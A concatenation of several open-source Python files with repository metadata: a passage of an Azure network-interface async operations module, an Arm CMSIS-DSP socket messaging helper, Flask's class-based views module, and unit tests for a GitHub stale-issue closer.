'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'} # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'} # type: ignore
async def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Get the specified network interface in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_virtual_machine_scale_set_ip_configurations(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceIPConfigurationListResult"]:
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_ip_configurations.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_ip_configurations.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
async def get_virtual_machine_scale_set_ip_configuration(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
ip_configuration_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterfaceIPConfiguration":
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration.
:type ip_configuration_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_ip_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_ip_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
def list_cloud_service_role_instance_network_interfaces(
self,
resource_group_name: str,
cloud_service_name: str,
role_instance_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets information about all network interfaces in a role instance in a cloud service.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cloud_service_name: The name of the cloud service.
:type cloud_service_name: str
:param role_instance_name: The name of role instance.
:type role_instance_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_cloud_service_role_instance_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'cloudServiceName': self._serialize.url("cloud_service_name", cloud_service_name, 'str'),
'roleInstanceName': self._serialize.url("role_instance_name", role_instance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_cloud_service_role_instance_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/cloudServices/{cloudServiceName}/roleInstances/{roleInstanceName}/networkInterfaces'} # type: ignore
def list_cloud_service_network_interfaces(
self,
resource_group_name: str,
cloud_service_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a cloud service.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cloud_service_name: The name of the cloud service.
:type cloud_service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_08_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_cloud_service_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'cloudServiceName': self._serialize.url("cloud_service_name", cloud_service_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_cloud_service_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/cloudServices/{cloudServiceName}/networkInterfaces'} # type: ignore
async def get_cloud_service_network_interface(
self,
resource_group_name: str,
cloud_service_name: str,
role_instance_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Get the specified network interface in a cloud service.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param cloud_service_name: The name of the cloud service.
:type cloud_service_name: str
:param role_instance_name: The name of role instance.
:type role_instance_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get_cloud_service_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'cloudServiceName': self._serialize.url("cloud_service_name", cloud_service_name, 'str'),
'roleInstanceName': self._serialize.url("role_instance_name", role_instance_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_cloud_service_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/cloudServices/{cloudServiceName}/roleInstances/{roleInstanceName}/networkInterfaces/{networkInterfaceName}'} # type: ignore
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/aio/operations/_network_interfaces_operations.py
|
Python
|
mit
| 72,800 | 0.004973 |
# --------------------------------------------------------------------------
# Copyright (c) 2020-2022 Arm Limited (or its affiliates). All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
import sys
# VSI KIND
VSIOUTPUT = 0
VSIINPUT = 1
# MESSAGE IDs
CLIENTREADBUF=1
CLIENTWRITEBUF=2
CLIENTSTOP=3
# PACKETSIZE : default number of bytes read on a socket
PACKETSIZE = 1024
# Conersion between size expressed in bytes or in Q15
INTSIZE = 2
# Error raised when trying to read / write to sockets
class ErrorTooMuchDataReceived(Exception):
pass
class CantReceiveData(Exception):
pass
def clientID(inputMode,theID):
return([(theID << 1) | inputMode])
# Receive a given number of bytes
# Socket is read by block of PACKETSIZE
def receiveBytes(conn,nb):
data = b""
while nb > 0:
if nb < PACKETSIZE:
newData = conn.recv(nb)
if not newData: raise CantReceiveData
else:
newData= conn.recv(PACKETSIZE)
if not newData: raise CantReceiveData
nb = nb - len(newData)
if nb < 0:
raise ErrorTooMuchDataReceived
data += newData
return(data)
# Send bytes
def sendBytes(conn,data):
conn.sendall(data)
# Convert a list of Q15 to a bytestream
def list_to_bytes(l):
return(b"".join([x.to_bytes(INTSIZE,byteorder=sys.byteorder,signed=True) for x in l]))
# Convert a bytestream to a list of Q15
def bytes_to_list(l):
res=[]
i = 0
while(i<len(l)):
res.append(int.from_bytes(l[i:i+INTSIZE],byteorder=sys.byteorder,signed=True))
i = i+INTSIZE
return(res)
# Send a list of Q15
def sendIntList(conn,l):
data = list_to_bytes(l)
sendBytes(conn,data)
# Receive a list of Q15
def getIntList(conn,length):
data = receiveBytes(conn,INTSIZE*length)
return(bytes_to_list(data))
# Low level bytes management
# Return the message ID and the number of bytes expected in the message
def getMsgAndNbOfBytes(data):
msgID = int(data[0])
length= int.from_bytes(data[1:5],byteorder=sys.byteorder,signed=False)
return(msgID,length)
# A client is requesting data from the server. It is the input of VHT
# Client -> Server
def getBufferMsg(conn,nbBytes):
# Ask buffer from server
a=(CLIENTREADBUF).to_bytes(1,byteorder=sys.byteorder)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Receive buffer from server
data = receiveBytes(conn,nbBytes)
return(data)
# Stop the server when the end of the SDF scheduling has been reached.
# It is to make it easier to end the demo.
# Only the VHT client has to be killed.
# Client -> Server
def stopMsg(conn):
# Send a stop message to server
a=(CLIENTSTOP).to_bytes(1,byteorder=sys.byteorder)
b=(0).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Data in bytes
# A client is sending that some bytes be sent to the server
# It is the output of VHT
# Client -> Server
def writeBufferMsg(conn,theBytes):
# Tell server a buffer is coming
a=(CLIENTWRITEBUF).to_bytes(1,byteorder=sys.byteorder)
nbBytes = len(theBytes)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg = a+b+theBytes
# Send message and buffer to server
sendBytes(conn,msg)
|
ARM-software/CMSIS_5
|
CMSIS/DSP/cmsisdsp/sdf/nodes/host/message.py
|
Python
|
apache-2.0
| 3,886 | 0.022131 |
# -*- coding: utf-8 -*-
"""
flask.views
~~~~~~~~~~~
This module provides class-based views inspired by the ones in Django.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from .globals import request
http_method_funcs = frozenset(['get', 'post', 'head', 'options',
'delete', 'put', 'trace', 'patch'])
class View(object):
"""Alternative way to use view functions. A subclass has to implement
:meth:`dispatch_request` which is called with the view arguments from
the URL routing system. If :attr:`methods` is provided the methods
do not have to be passed to the :meth:`~flask.Flask.add_url_rule`
method explicitly::
class MyView(View):
methods = ['GET']
def dispatch_request(self, name):
return 'Hello %s!' % name
app.add_url_rule('/hello/<name>', view_func=MyView.as_view('myview'))
When you want to decorate a pluggable view you will have to either do that
when the view function is created (by wrapping the return value of
:meth:`as_view`) or you can use the :attr:`decorators` attribute::
class SecretView(View):
methods = ['GET']
decorators = [superuser_required]
def dispatch_request(self):
...
The decorators stored in the decorators list are applied one after another
when the view function is created. Note that you can *not* use the class
based decorators since those would decorate the view class and not the
generated view function!
"""
#: A for which methods this pluggable view can handle.
methods = None
#: The canonical way to decorate class-based views is to decorate the
#: return value of as_view(). However since this moves parts of the
#: logic from the class declaration to the place where it's hooked
#: into the routing system.
#:
#: You can place one or more decorators in this list and whenever the
#: view function is created the result is automatically decorated.
#:
#: .. versionadded:: 0.8
decorators = []
def dispatch_request(self):
"""Subclasses have to override this method to implement the
actual view function code. This method is called with all
the arguments from the URL rule.
"""
raise NotImplementedError()
@classmethod
def as_view(cls, name, *class_args, **class_kwargs):
"""Converts the class into an actual view function that can be used
with the routing system. Internally this generates a function on the
fly which will instantiate the :class:`View` on each request and call
the :meth:`dispatch_request` method on it.
The arguments passed to :meth:`as_view` are forwarded to the
constructor of the class.
"""
def view(*args, **kwargs):
self = view.view_class(*class_args, **class_kwargs)
return self.dispatch_request(*args, **kwargs)
if cls.decorators:
view.__name__ = name
view.__module__ = cls.__module__
for decorator in cls.decorators:
view = decorator(view)
# we attach the view class to the view function for two reasons:
# first of all it allows us to easily figure out what class-based
# view this thing came from, secondly it's also used for instantiating
# the view class so you can actually replace it with something else
# for testing purposes and debugging.
view.view_class = cls
view.__name__ = name
view.__doc__ = cls.__doc__
view.__module__ = cls.__module__
view.methods = cls.methods
return view
class MethodViewType(type):
def __new__(cls, name, bases, d):
rv = type.__new__(cls, name, bases, d)
if 'methods' not in d:
methods = set(rv.methods or [])
for key, value in d.iteritems():
if key in http_method_funcs:
methods.add(key.upper())
# if we have no method at all in there we don't want to
# add a method list. (This is for instance the case for
# the baseclass or another subclass of a base method view
# that does not introduce new methods).
if methods:
rv.methods = sorted(methods)
return rv
class MethodView(View):
"""Like a regular class-based view but that dispatches requests to
particular methods. For instance if you implement a method called
:meth:`get` it means you will response to ``'GET'`` requests and
the :meth:`dispatch_request` implementation will automatically
forward your request to that. Also :attr:`options` is set for you
automatically::
class CounterAPI(MethodView):
def get(self):
return session.get('counter', 0)
def post(self):
session['counter'] = session.get('counter', 0) + 1
return 'OK'
app.add_url_rule('/counter', view_func=CounterAPI.as_view('counter'))
"""
__metaclass__ = MethodViewType
def dispatch_request(self, *args, **kwargs):
meth = getattr(self, request.method.lower(), None)
# if the request method is HEAD and we don't have a handler for it
# retry with GET
if meth is None and request.method == 'HEAD':
meth = getattr(self, 'get', None)
assert meth is not None, 'Unimplemented method %r' % request.method
return meth(*args, **kwargs)
|
darren-rogan/CouchPotatoServer
|
libs/flask/views.py
|
Python
|
gpl-3.0
| 5,629 | 0 |
# python -m unittest discover
import unittest
from datetime import datetime
from tasks import old_issues as c
class TestCloseOldIssue(unittest.TestCase):
def test_is_closed_issue(self):
self.assertEquals(c.is_closed({'closed_at': None}), False)
self.assertEquals(c.is_closed({'closed_at': "2014-10-10T00:09:51Z"}), True)
def test_is_pull_request(self):
self.assertEquals(c.is_pull_request({}), False)
self.assertEquals(c.is_pull_request({'pull_request': {}}), True)
def test_has_milestone(self):
self.assertEquals(c.has_milestone({'milestone': None}), False)
self.assertEquals(c.has_milestone({'milestone': "v1.1"}), True)
def test_is_old_issue(self):
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 9), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 11), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 12), close_inactive_after=10), True)
def test_has_labels_preventing_close(self):
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'bug'
}]
}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({ 'labels': [] }, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'ready'
}]
}, ['in progress', 'ready', 'high priority']), True)
def test_has_comments_preventing_close(self):
self.assertEquals(c.has_comments_preventing_close({
'comments': None
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 0
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 2
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 3
}, 2), True)
def test_has_assignee_preventing_close(self):
self.assertEquals(c.has_assignee_preventing_close({
'assignee': None
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': {}
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': { 'login': 'steve' }
}), True)
def test_has_milestone_preventing_close(self):
self.assertEquals(c.has_milestone_preventing_close({}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': None
}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': {}
}), False)
